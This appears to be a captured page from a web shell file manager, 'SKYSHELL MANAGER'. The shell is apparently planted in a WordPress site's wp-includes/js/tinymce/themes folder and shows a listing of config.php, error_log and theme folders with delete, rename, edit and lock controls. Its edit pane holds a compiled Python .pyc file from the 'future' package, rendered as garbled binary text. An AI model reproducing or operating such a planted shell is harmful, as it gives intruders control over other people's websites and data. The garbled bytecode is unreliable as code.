📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: fix_oldstr_wrap.cpython-36.pyc
3 ��ji� � @ sp d Z ddlmZ ddlZddlmZ ddlmZ ddlm Z ddl mZmZm Z ejd�ZG d d � d ej�ZdS )a For the ``future`` package. Adds this import line: from past.builtins import str as oldstr at the top and wraps any unadorned string literals 'abc' or explicit byte-string literals b'abc' in oldstr() calls so the code has the same behaviour on Py3 as on Py2.6/2.7. � )�unicode_literalsN)� fixer_base)�token)�syms)� future_import�touch_import_top�wrap_in_fn_callz[^uUrR]?[\'\"]c @ s e Zd ZdZdZdd� ZdS )� FixOldstrWrapT�STRINGc C sX |j tjkrTtdd|� tj|j�rT|j� }d|_d|j |_t d|g|jd�}|S d S )Nz past.typesZoldstr� �b)�prefix) �typer r r �_literal_re�match�value�cloner r )�self�node�results�new�wrapped� r �H/root/tmp/pip-build-31b9end2/future/libfuturize/fixes/fix_oldstr_wrap.py� transform s zFixOldstrWrap.transformN)�__name__� __module__�__qualname__Z BM_compatibleZPATTERNr r r r r r s r )�__doc__� __future__r �reZlib2to3r Z lib2to3.pgen2r Zlib2to3.fixer_utilr Zlibfuturize.fixer_utilr r r �compiler ZBaseFixr r r r r �<module> s
Save